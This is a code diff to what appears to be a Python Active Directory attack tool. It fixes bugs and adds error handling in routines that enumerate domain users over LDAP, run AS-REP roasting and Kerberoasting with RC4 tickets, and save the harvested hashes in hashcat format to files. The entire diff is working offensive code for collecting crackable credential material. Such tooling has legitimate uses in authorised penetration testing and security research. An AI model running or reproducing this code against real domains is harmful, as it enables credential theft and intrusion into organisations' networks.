@@ -196,7 +196,7 @@ async def run_auto():
 		
 		logon = get_logon_info()
 		domain = logon['domain']
-		url = 'ldap+sspi-ntlm://%s' % logon['logoserver']
+		url = 'ldap+sspi-ntlm://%s' % logon['logonserver']
 		msldap_url = MSLDAPURLDecoder(url)
 		client = msldap_url.get_client()
 		_, err = await client.connect()
@@ -207,6 +207,7 @@ async def run_auto():
 		spn_users = []
 		asrep_users = []
 		errors = []
+		results = []
 		spn_cnt = 0
 		asrep_cnt = 0
 		async for user, err in client.get_all_knoreq_users():
@@ -230,9 +231,11 @@ async def run_auto():
 			results = []
 			ks = KerberosTarget(domain)
 			ar = APREPRoast(ks)
-			res = await ar.run(cred, override_etype = [23])
-			results.append(res)	
-			
+			try:
+				res = await ar.run(cred, override_etype = [23])
+				results.append(str(res))	
+			except Exception as e:
+				print("asreproast for user %s failed. Reason: %s" % (cred, e))
 		filename = 'asreproast_%s_%s.txt' % (logon['domain'], datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
 		with open(filename, 'w', newline = '') as f:
 				for thash in results:
@@ -241,16 +244,19 @@ async def run_auto():
 
 		results = []
 		for cred in spn_users:
-			spn_name = '%s@%s' % (cred.username, cred.domain)
-			if spn_name[:6] == 'krbtgt':
-				continue
-			ksspi = KerberoastSSPI()
 			try:
-				ticket = ksspi.get_ticket_for_spn(spn_name)
+				spn_name = '%s@%s' % (cred.username, cred.domain)
+				if spn_name[:6] == 'krbtgt':
+					continue
+				ksspi = KerberoastSSPI()
+				try:
+					ticket = ksspi.get_ticket_for_spn(spn_name)
+				except Exception as e:
+					errors.append((spn_name, e))
+					continue
+				results.append(TGSTicket2hashcat(ticket))
 			except Exception as e:
-				errors.append((spn_name, e))
-				continue
-			results.append(TGSTicket2hashcat(ticket))
+				print("spnroast-sspi for user %s failed. Reason: %s" % (cred, e))
 		
 		filename = 'spnroast_%s_%s.txt' % (logon['domain'], datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
 		with open(filename, 'w', newline = '') as f:
@@ -317,7 +323,7 @@ async def amain(args):
 		hashes = []
 		for target in targets:
 			h = await ar.run(target, override_etype = [args.etype])
-			hashes.append(h)
+			hashes.append(str(h))
 
 		if args.out_file:
 			with open(args.out_file, 'w', newline = '') as f:
